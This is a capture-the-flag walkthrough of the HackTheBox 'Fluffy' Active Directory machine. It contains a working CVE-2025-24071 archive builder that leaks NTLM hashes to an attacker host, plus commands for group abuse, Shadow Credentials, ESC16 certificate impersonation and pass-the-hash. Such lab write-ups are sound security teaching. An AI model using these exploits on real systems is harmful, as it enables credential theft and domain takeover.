HackTheBox Fluffy Writeup
A walkthrough of the HackTheBox 'Fluffy' machine, an easy-rated Windows Active Directory box. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
As is common in real-life Windows pentests, you start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
RECONNAISSANCE
Nmap
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ nmap -sC -sV 10.129.66.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 04:40 EDT
Nmap scan report for 10.129.66.55
Host is up (0.23s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 15:41:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:39+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:39+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2025-05-25T15:41:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.43 seconds
Note the clock skew of about 7 hours that nmap reports against the DC: every Kerberos-based step later on needs our clock synced to the DC, because the KDC rejects requests that are more than 5 minutes off. Using the given credentials to list the available SMB shares, we find something interesting:
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ nxc smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.129.66.55 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.55 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.66.55 445 DC01 [*] Enumerated shares
SMB 10.129.66.55 445 DC01 Share Permissions Remark
SMB 10.129.66.55 445 DC01 ----- ----------- ------
SMB 10.129.66.55 445 DC01 ADMIN$ Remote Admin
SMB 10.129.66.55 445 DC01 C$ Default share
SMB 10.129.66.55 445 DC01 IPC$ READ Remote IPC
SMB 10.129.66.55 445 DC01 IT READ,WRITE
SMB 10.129.66.55 445 DC01 NETLOGON READ Logon server share
SMB 10.129.66.55 445 DC01 SYSVOL READ Logon server share
We have READ and WRITE access on the IT share. Write access is the interesting part: anything we drop there may be opened by whoever uses the share, which unlocks several attack paths. Looking at the contents of the IT share:
Opening Upgrade_Notice.pdf shows that the systems are in the middle of an upgrade and lists several vulnerabilities that are still unpatched. Among the listed CVEs, CVE-2025-24071 stands out.
CVE-2025-24071: an attacker can exploit this vulnerability by constructing a RAR/ZIP archive containing a malicious SMB path (a .library-ms file whose location points at an attacker-controlled UNC path). Upon decompression, Windows Explorer parses the file and triggers an SMB authentication request to that path, exposing the user's NetNTLMv2 response (loosely called the NTLM hash).
Since we have write access to the IT share, we use a CVE-2025-24071 exploit to generate the malicious ZIP file and upload it to the IT share. After a short while the archive is extracted on the box; in the meantime we run Responder on our interface and catch the victim's authentication attempt.
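The archive-building step, as an added example written for this writeup rather than the exploit script the author used: it writes a .library-ms file whose simpleLocation URL is a UNC path to our Responder host, zips it, and includes a small defender-side check that lists every UNC target found inside .library-ms members of an archive. The .library-ms layout follows the public proof-of-concept for this CVE; the attacker IP 10.10.14.5, the share name and the file names are assumptions.

```python
"""Build the ZIP used for the CVE-2025-24071 NTLM-leak step (added example).

Constructed for this writeup, not the author's exploit script.
Assumptions: Responder listens on 10.10.14.5; the .library-ms layout follows
the public PoC for this CVE; file and share names are arbitrary.
"""
import io
import xml.etree.ElementTree as ET
import zipfile

ATTACKER_IP = "10.10.14.5"                   # assumption: host running Responder
LIBRARY_NAME = "Upgrade_Notice.library-ms"   # assumption: any name works
ARCHIVE_NAME = "Upgrade.zip"                 # assumption: uploaded to the IT share
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Template of a Windows library description; {unc} is the only attacker-controlled
# part. Explorer resolves simpleLocation/url when it renders the extracted folder,
# which is what triggers the outbound SMB authentication.
LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34622</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{unc}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_library_ms(attacker_ip, share="shared"):
    """Return the .library-ms XML pointing at \\\\attacker_ip\\share."""
    unc = "\\\\" + attacker_ip + "\\" + share
    return LIBRARY_MS.format(unc=unc)


def build_archive(attacker_ip):
    """Return ZIP bytes containing the single .library-ms member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(LIBRARY_NAME, build_library_ms(attacker_ip))
    return buf.getvalue()


def extract_unc_targets(archive_bytes):
    """Defender-side check: every UNC url inside .library-ms members of a ZIP."""
    found = []
    ns = {"l": LIBRARY_NS}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            for url in root.iterfind(".//l:simpleLocation/l:url", ns):
                if url.text and url.text.startswith("\\\\"):
                    found.append(url.text)
    return found


if __name__ == "__main__":
    data = build_archive(ATTACKER_IP)
    with open(ARCHIVE_NAME, "wb") as fh:
        fh.write(data)
    print("wrote", ARCHIVE_NAME, "with UNC targets:", extract_unc_targets(data))
```

The same `extract_unc_targets` check is what you would run on inbound archives in a mail or file-share gateway: a .library-ms member that points at an external UNC path has no legitimate reason to be there.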
p.agila::FLUFFY:44ba23f06d0012ce…
What Responder captured is the NetNTLMv2 challenge-response of user p.agila (Responder labels it NTLMv2-SSP). Unlike an NT hash it cannot be passed, because it is bound to the server challenge, but it can be cracked offline: hashcat mode 5600 takes the captured line as-is.
Cracking it with a wordlist gives the password, so we now have access to user p.agila: p.agila:prometheusx-303
Bloodhound
With either set of credentials we can collect Active Directory data with a BloodHound ingestor; I used netexec's built-in collector.
In BloodHound we can see that user p.agila is a member of the Service Account Managers group, and that this group has GenericAll over the Service Accounts group.
Generic All Exploit
GenericAll on a group includes the right to change its membership, so to exploit it we simply add user p.agila to the Service Accounts group:
net rpc group addmem "Service accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.66.55"
Verifying the group membership
net rpc group members "Service accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.66.55"
Digging further, the Service Accounts group has GenericWrite over three user objects, and as a member of that group p.agila now inherits that right.
Generic Write Exploit
GenericWrite on a user object lets us write its msDS-KeyCredentialLink attribute, so we use certipy-ad to perform a Shadow Credentials attack: it adds a key credential to the target account, authenticates with PKINIT using that key, and recovers the account's NT hash. This step is Kerberos-based, so the clock skew seen in the nmap output must be corrected first.
Using the NT hash of the winrm_svc user, we get a WinRM session with evil-winrm and read user.txt.
PRIVILEGE ESCALATION
In the same way we dump the NT hash of user ca_svc. Its display name (certificate authority service) hints at an ADCS attack, so we use certipy-ad to check the CA and its templates for known misconfigurations:
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.93.221 -stdout -vuln
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
certipy-ad flags ESC16. The CA has the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2, listed above under Disabled Extensions) switched off, so every certificate it issues lacks the SID that the DC uses for strong certificate mapping. The DC then falls back to mapping the certificate by the UPN in its SAN, and we control the UPN of ca_svc through GenericWrite. This only works while the DC is in compatibility mode for certificate mapping; with StrongCertificateBindingEnforcement set to full enforcement it would reject certificates without the SID extension. Following the ESC16 section of the Certipy wiki, the plan is: note the victim's current UPN, set it to the target's name, request a certificate as the victim, restore the UPN, then authenticate with the certificate. First, read the current attributes of ca_svc:
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad account -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.93.221 -user ca_svc read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-05-25T20:30:14+00:00
Initially the UPN of user ca_svc is ca_svc@fluffy.htb. Using certipy-ad's account update action we change it to administrator (with no domain suffix, so that it matches the built-in Administrator account's sAMAccountName).
With the UPN updated, we request a certificate from the User template as ca_svc:
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad req -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.18.44 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): n
[*] Wrote certificate and private key to 'administrator_715a5adc-5576-48d6-bf1b-450016b8a3e1.pfx'
We now hold a certificate whose UPN says administrator and which, as certipy-ad notes, carries no object SID.
Before using it to log in as administrator, we must reset the UPN of ca_svc back to ca_svc@fluffy.htb: as long as ca_svc still carries the UPN administrator, the DC would map the certificate straight back to ca_svc instead of to the Administrator account.
With the UPN restored, we authenticate with the administrator's certificate using certipy-ad.
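The reasoning behind the update, request, revert, authenticate order, as an added example written for this writeup (it is neither Windows code nor Certipy code): a simplified model of how the KDC maps a client certificate to an account. It reduces the rules to strong mapping by the SID extension, weak mapping by UPN, and a sAMAccountName fallback, which is the behaviour the Certipy wiki describes for ESC16. The ca_svc SID is the one shown in the account output above, Administrator's RID is 500 by definition, and the exact lookup order inside the real KDC is an assumption.

```python
"""Simplified model of KDC certificate-to-account mapping, to show why ESC16
works and why the victim's UPN must be reverted before authenticating.

Added example for this writeup, not Windows or Certipy code. The ca_svc SID
comes from the account output above; Administrator is RID 500 by definition;
the lookup order is a simplification of the documented behaviour.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SID_EXT_OID = "1.3.6.1.4.1.311.25.2"   # szOID_NTDS_CA_SECURITY_EXT, disabled on fluffy-DC01-CA
COMPATIBILITY, FULL_ENFORCEMENT = 1, 2  # StrongCertificateBindingEnforcement values


@dataclass
class Account:
    sam: str
    sid: str
    upn: Optional[str]


@dataclass
class Cert:
    upn: Optional[str]                                        # SAN otherName UPN
    extensions: Dict[str, str] = field(default_factory=dict)  # OID -> value


def issue(requester, with_sid_extension):
    """What the User template does at issuance: copy the requester's UPN into the
    SAN and, unless the CA has the extension disabled (ESC16), embed its SID."""
    ext = {SID_EXT_OID: requester.sid} if with_sid_extension else {}
    return Cert(upn=requester.upn, extensions=ext)


def map_certificate(cert, accounts, enforcement):
    """Return the Account the KDC would authenticate as, or None if rejected."""
    sid = cert.extensions.get(SID_EXT_OID)
    if sid is not None:  # strong mapping: the SID baked in at issuance wins over the UPN
        return next((a for a in accounts if a.sid == sid), None)
    if enforcement >= FULL_ENFORCEMENT or cert.upn is None:
        return None      # full enforcement refuses to fall back to weak mapping
    wanted = cert.upn.lower()
    for a in accounts:   # weak mapping 1: exact userPrincipalName match
        if a.upn is not None and a.upn.lower() == wanted:
            return a
    local = wanted.split("@", 1)[0]
    for a in accounts:   # weak mapping 2: fall back to sAMAccountName
        if a.sam.lower() == local:
            return a
    return None


def _who(acct):
    return acct.sam if acct else "REJECTED"


def esc16_walkthrough(enforcement, ca_disables_sid_ext=True):
    """Replay the writeup's steps; returns (identity before revert, identity after revert)."""
    admin = Account("administrator", "S-1-5-21-497550768-2797716248-2627064577-500", None)
    ca_svc = Account("ca_svc", "S-1-5-21-497550768-2797716248-2627064577-1103", "ca_svc@fluffy.htb")
    directory = [admin, ca_svc]
    ca_svc.upn = "administrator"                                   # step 1: GenericWrite -> rewrite UPN
    cert = issue(ca_svc, with_sid_extension=not ca_disables_sid_ext)  # step 2: certipy req
    before = _who(map_certificate(cert, directory, enforcement))   # auth before the revert
    ca_svc.upn = "ca_svc@fluffy.htb"                               # step 3: restore the UPN
    after = _who(map_certificate(cert, directory, enforcement))    # step 4: certipy auth
    return before, after


if __name__ == "__main__":
    print("ESC16, compatibility mode :", esc16_walkthrough(COMPATIBILITY))
    print("ESC16, full enforcement   :", esc16_walkthrough(FULL_ENFORCEMENT))
    print("SID extension re-enabled  :", esc16_walkthrough(COMPATIBILITY, ca_disables_sid_ext=False))
```

Run as-is it shows the three cases that matter: in compatibility mode the same certificate maps to ca_svc before the revert and to administrator after it; in full enforcement it is rejected outright; and with the SID extension re-enabled on the CA the tampered UPN is ignored because the SID pins the certificate to ca_svc. The last two rows are the fix.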
certipy-ad authenticates with the certificate over PKINIT and recovers the NT hash of Administrator from the resulting ticket.
Using this NT hash, we get a WinRM session as administrator and read root.txt:
evil-winrm -i fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e